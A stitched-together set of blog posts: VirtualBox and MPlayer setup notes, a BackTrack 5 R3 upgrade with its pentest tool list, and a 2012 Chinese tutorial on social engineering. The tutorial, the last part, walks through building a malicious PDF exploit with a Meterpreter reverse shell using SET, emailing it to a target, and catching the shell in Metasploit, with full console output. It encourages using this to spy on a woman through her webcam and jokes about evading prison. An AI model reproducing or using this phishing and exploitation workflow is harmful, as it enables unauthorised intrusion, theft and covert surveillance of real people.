VirtualBox网络互联

bt5  安装了virtualbox想要主机与虚拟机互联。

查看了几个网上的讲解,各个讲的都很理论。但是相互之间是他妈矛盾的。擦。

最后验证下面一条可行:

第二种 Bridged Adapter模式

需要配置的是:

1.  主机 不用动

2. 虚拟机把防火墙关掉!!!这个很重要哦。否则ping不通。各种ping不通

3. 虚拟机设成DHCP指派ip.也就是自动分配ip.

其他的没试

BT5安装VirtualBox

有段时间了,这个问题,在BT5下一直装不上。后面看了官方的wiki才知道要安装特殊的版本才可以成功。具体方法如下:

wget http://download.virtualbox.org/virtualbox/4.0.10/virtualbox-4.0_4.0.10-72479~Ubuntu~lucid_i386.deb

dpkg -i virtualbox-4.0_4.0.10-72479~Ubuntu~lucid_i386.deb

就这么简单,就好了。如果其他问题请看http://www.backtrack-linux.org/wiki/index.php/Install_VBox

作者:lengf

Install Mplayer and Multimedia Codecs (libdvdcss2,w32codecs,w64codecs) on ubuntu 11.04 (Natty)

MPlayer is a movie and animation player that supports a wide range of codecs and file formats, including MPEG 1/2/4,DivX 3/4/5, Windows Media 7/8/9, RealAudio/Video up to 9, Quicktime 5/6, and Vivo 1/2. It has many MX/SSE (2)/3Dnow(Ex) optimized native audio and video codecs, but allows using XAnim’s and RealPlayer’s binary codec plugins, and Win32 codec DLLs. It has basic VCD/DVD playback functionality, including DVD subtitles, but supports many text- based subtitle formats too. For video output, nearly every existing interface is supported. It’s also able to convert any supported files to raw/divx/mpeg4 AVI (pcm/mp3 audio), and even video grabbing from V4L devices.

Install Mplayer in Ubuntu 11.04 (Natty)

You have to make sure you have enabled universe,multiverse repositories

Now you need to run the following command to update the source list

sudo apt-get update

Install mplayer using the following command

sudo apt-get install mplayer

or

Click on the following link

apt://mplayer

If you want to open mplayer go to Applications—>Sound&Video—> Mplayer Movie Player

Install w32 video codecs and libdvdcss2 in Ubuntu 11.04 (Natty)

Support for WMV, RealMedia and other formats has been bundled into the w32codecs package. This package is not available from the Ubuntu repositories due to licensing and legal restrictions.To play encrypted DVDs, the libdvdcss2 package is essential.

The following command adds Medibuntu’s repository to Ubuntu. It also adds Medibuntu’s GPG key to your keyring, which is needed to authenticate the Medibuntu packages.

sudo wget http://www.medibuntu.org/sources.list.d/$(lsb_release -cs).list –output-document=/etc/apt/sources.list.d/medibuntu.list

sudo apt-get -q update

sudo apt-get –yes -q –allow-unauthenticated install medibuntu-keyring

sudo apt-get -q update

You may also wish to add the following packages. The first will cause many apps from the Medibuntu repository to appear in Ubuntu Software Center (Ubuntu 9.10+) or Add/Remove Applications (versions prior to 9.10). The second will allow users to generate crash reports against Medibuntu packages and submit them to the Medibuntu bugtracker.

sudo apt-get –yes install app-install-data-medibuntu apport-hooks-medibuntu

Please note you may have to use –force-yes instead of –yes in order for this command to succeed.
For i386 Users install Codecs using the following command

sudo apt-get install w32codecs libdvdcss2

For amd64 Users install Codecs using the following command

sudo apt-get install w64codecs libdvdcss2

Using above download locations you can install most of the mutimedia codecs for ubuntu.

Mplayer Plugin for Firefox

If you want to install Mplayer with plug-in for Mozilla Firefox run the following command

sudo apt-get install mozilla-mplayer

or click on the following link

apt://mozilla-mplayer

【系统】BackTrack R2快速升级R3

最近,刚刚发布了BT5 R3,但又不想重新安装系统。下面介绍一个很简单的方法,升级R2到R3。
首先,你要确保你的现有的系统已经更新到最新:
apt-get update && apt-get dist-upgrade升级完后,剩下的就是安装R3新增加的工具。
要注意的是,32位和64位的工具之间有细微的差别,所以一定要选择正确的工具包。
32-Bit Tools
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
64-Bit Tools:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
OK!完成更新
经过本人的测试发现32位的更新里面安装的软件列表部分没有,现提供一个可以直接运行的软件列表。
apt-get install blueranger inundator intersect mercury netgear-telnetenable jboss-autopwn deblaze apache-users kautilya lynis-audit wifihoney twofi acccheck statsprocessor iphoneanalyzer jad javasnoop ewizard websploit dnmap  unix-privesc-check dhcpig intercepter-ng laudanum wifite tnscmd10g bluepot subterfuge jigsaw urlcrazy creddump android-sdk apktool ded termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

 

kylin:正好我的bt5需要升级了,双系统,重装的话太麻烦,还是直接用这办法吧~~~

本文固定链接: http://www.kylins.org/302.html | kylin’s blog|关注网络安全与互联网动态

【专业技巧】可怕的社会工程学 第一季

建议大家购买主页君状态提及的《metasploit渗透测试指南》中文版,亚马逊上有。不是广告,主页君又拿不到提成=。= 只是这本书对于初级脚本小子(绝大多数中国黑客水平)来说是迈向专业级黑客很不错的第一步。

至于要花钱这种事情,我会告诉你metasploit pro貌似要几千块吗?什么爱好都是要付出代价的,就像我们大多数用虚拟机装BackTrack的得去额外购买一张外置网卡一样。

介绍几点常识(如果你是有一定渗透基础的,可以直接跳过):

1°除了一部分社工,所有的入侵全部依靠漏洞。大部分社工也需要依赖漏洞。苍蝇不叮无缝的蛋,生活不是小说,黑客也不是传奇————至少绝大部分不是。小说中的传奇黑客并不是一个不能达到的高度:只要你掌握了超前整个时代5~10年的漏洞,你就是传奇。即使是这样,也很难出现随便接个网线开台电脑就能入侵的情况————没有工具啊。我们所需的工具再简单,也有几十几百行,临时编工具编死你。

2°实际上掌握一两个excellent级别的未公布的漏洞,你就会觉得很多主机脆弱的像处女膜。如果这几个漏洞是你自己发掘的,那恭喜你你已经可以向安全公司投简历了。

3°wooyun上经常公布一些漏洞,但那些漏洞即使rank值很高,绝大部分也只是高针对性应用面极窄的漏洞。而且绝大部分得归结于管理员的疏忽————这些不是上文所说的广泛性漏洞。

4°除非你真掌握了超前于时代的漏洞(肯定有人有组织掌握着这样的昂贵的漏洞),否则最恐怖的一定是社工————社会工程学。中国的黑客圈子经常讲的钓鱼,就是社工的一种。社工是很广泛的一个技巧,绝不像有些菜鸟们理解的猜密码猜密保什么的。

正文开始。
我讲的是我理解的社工,一家之言,若和网络上介绍的不同,请一笑而过。
原创 by 猪头

我讲的社工建立在BackTrack平台上,主要是讲社会工程工具包(SET)。这个工具包安装在/pentest/exploits/SET 目录下。

一:群发钓鱼邮件。

听起来很不道德而且不容易让人上当,对吧?实际情况恰恰相反。2010年,包括谷歌公司在内的很多家大型公司沦陷于极光“Aurora”攻击事件,就是因为这样的攻击。

现在大家的警惕性都足以让大家不会去点击来历不明的邮件里的莫名链接,更不会把邮件里面的可执行文件下载运行。更何况电脑的杀毒软件和防火墙又不是吃素的。但这些并不代表你就安全了。

利用漏洞:特殊构造的文件格式漏洞渗透攻击;
案例:使用Adobe PDF漏洞。

注册一个类似于公司的域名,如companyxyz.com,或者注册一个子域名。然后对于目标发送一些有针对性的邮件。比如,谷歌公司负责对外客户交涉的一些部门人员就不大可能拒绝阅读一封看起来像某家公司发过来的邮件,更何况内容合理,附带的是一封PDF文本,没有任何异常。然后,顺理成章的,打开邮件里的pdf,成功溢出,初步渗透成功。
钓鱼邮件生成发送方法:
————————————————————————————
root@bt:/pentest/exploits/set# ./set

Select from the menu:

1. Spear-Phishing Attack Vectors (*)
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules138 Chapter 10
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure “Sendmail” is installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack (*)
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1

Select the file format exploit you want.

The default is the PDF embedded EXE.
********** PAYLOADS **********

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. SET Custom Written Document UNC LM SMB Capture Attack
3. Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4. Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5. Adobe Flash Player ‘Button’ Remote Code Execution
6. Adobe CoolType SING Table ‘uniqueName’ Overflow
7. Adobe Flash Player ‘newfunction’ Invalid Pointer Use
Z 8. Adobe Collab.collectEmailInfo Buffer Overflow (*)
9. Adobe Collab.getIcon Buffer Overflow
10. Adobe JBIG2Decode Memory Corruption Exploit
11. Adobe PDF Embedded EXE Social Engineering
12. Adobe util.printf() Buffer Overflow
13. Custom EXE to VBA (sent via RAR) (RAR required)
14. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15. Adobe PDF Embedded EXE Social Engineering (NOJS)
16. Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17. Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

Enter the number you want (press enter for default): 8

1. Windows Reverse TCP Shel Spawn a command shell on victim and send back to
attacker.
2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back
to attacker.The Social-Engineer Toolkit 139
3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to
attacker.
4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64),
Meterpreter
6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on
remote system.
7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter.

[ Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443…
[*] Generating fileformat exploit…
[*] Please wait while we load the module tree…
[*] Started reverse handler on 10.10.1.112:443
[*] Creating ‘template.pdf’ file…
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of ‘template.whatever’
Do you want to rename the file?
example Enter the new filename: moo.pdf

1. Keep the filename, I don’t care. (*)
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 1
Keeping the filename and moving on.
———————————————————————————
上面就是生成“问题”PDF的过程。打(*)为我们选择的选项。当然你可以按情况和需要进行更改,比如PDF的文件名可以改成“爱一次伤一生的三个星座.pdf” = =

下面设置你要发送的对象:

————————————————————————————
Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1

Below is a list of available templates:
1: New Update
2: Computer Issue
3: Strange internet usage from your computer
4: LOL…have to check this out…
5: Status Report
6: Pay Raise Application Form
7: WOAAAA!!!!!!!!!! This is crazy…
8: BasketBall Tickets
9: Baby Pics
10: Have you seen this?
11: Termination List
12: How long has it been?
13: Dan Brown’s Angels & Demons

Enter the number you want to use: 5

[ Enter who you want to send email to: ihazomgsecurity@secmaniac.com

What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1

\ Enter your GMAIL email address: fakeemailaddy@gmail.com

Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails
———————————————————————————
我们这次的攻击针对单一邮件地址,将先前生成的pdf作为附件,发送出可爱的极具欺骗性的邮件。这个邮件可能将让你得以成功控制你女神的电脑,然后打开她的摄像头。说不定能看到些什么呢XD

最后一步,创建Metasploit监听端口用来监听攻击载荷反弹连接。(PS:由于是反弹连接,所以是被攻击者主动向攻击者发起连接,所以你现在理解了为什么我说大部分防火墙和杀毒软件不会起作用了吧——你主动去连别人,一般的防火墙怎么会阻止你)
———————————————————————————
Do you want to setup a listener yes or no: yes

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 10.10.1.112
LHOST => 10.10.1.112
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler…
msf exploit(handler) >
————————————————————————————————————————————————

当对方打开你的pdf文件后,按下面的操作,你这边的显示会是这样的:
———————————————————————————
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler…
msf exploit(handler) > [*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58087)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > shell
Process 2976 created.
Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Bob\Desktop>
———————————————————————————
看到最后没有,已经不是BackTrack的linux命令行界面了,而是XP的伪DOS界面了。你已经获得了对方的shell。下面you can do everything.

(PS:善于使用代理和跳板将极大地延长你在监狱外面的时间)

今天就写到这里吧,主页君好困啊呜呜呜,这是第一种专业社工,下面会持续更新的哦^_^

对了主页君忘了讲类似于猜解密码的前置社工了T^T 下次更新的时候尽量补上吧,下次更新可能是9号下午= =主页君要期末考了啊断更了别怪我。。。不过不会太监的~\(≧▽≦)/~啦啦啦

猪头 于2012.5.9凌晨
转载请注明来源http://page.renren.com/601190241/note/844956388